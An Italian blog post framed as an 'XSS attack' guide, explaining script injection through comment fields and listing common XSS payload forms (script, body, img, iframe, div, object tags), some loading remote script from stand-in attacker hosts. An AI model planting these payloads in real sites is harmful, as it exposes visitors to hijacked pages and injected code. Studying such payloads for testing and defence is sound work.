[Guida]XSS Attack!

Come promesso nell’articolo precendete ecco la guida per l’XSS Attack…L’XSS Attack è un attacco molto potente e per questo ne io ne il nostro staff ci assumiamo la responsabilità di ciò che farete con questa guida.

68946_700x428

In cosa consiste un attacco XSS? L’attacco XSS non è altro che un attacco tramite script. Prendiamo come esempio un sito in cui si possono postare commenti in un articolo ad esempio il nostro…L’attacker scriverà nel commento al posto di una frase normale uno script che può essere programmato in due codici…Il VBScript e il Javascript.Il piu diffuso è attacco per Javascript.In pratica l’attacker scrivera il javascript che verrà letto dalla pagina web cosi da avere il controllo totale. Ad esempio possiamo reinderizzare una pagina web su un altra…Facciamo l’esempio di prima.Siamo in una pagina in cui possiamo postare un commento e al posto del commento scriviamo “location=’:http://www.google.it’;”.Qualsiasi persona che adesso loggherà nella pagina sarà reinderizzata alla pagina appunto di Google,il proprietario del sito quindi dovrà accedere tramite ftp al sito per cancellare lo script inserito nella pagina web.Di seguito posto alcuni Script:

  • <SCRIPT> alert(“XSS”); </SCRIPT> Questo script farà visualizzare il messaggio scritto negli apici ("XSS") tramite un poup-up e non si potrà chiudere quindi la pagina rimarrà bloccata sul poupup

Riporto qui di seguito tutti li script con didascalia inglese postati da Acunetix Web Vulnerability Scanner:

The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>

The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG>

Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>

<INPUT>

If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>

The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>

The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>

The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

Lo staff di DEVICEMODD, non si assume nessuna responsabilità su come utilizzerete questa guida, il cui scopo è a livello informativo

Annunci

Tag:, ,

3 responses to “[Guida]XSS Attack!”

  1. AleX says :

    Ciao, consiglio anche di dare un’occhiata a questa pagina per approfondire l’argomento.
    In passato mi è stata utile per capire meglio questo genere di attacchi.
    Credits al grande RSnake.

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger hanno fatto clic su Mi Piace per questo: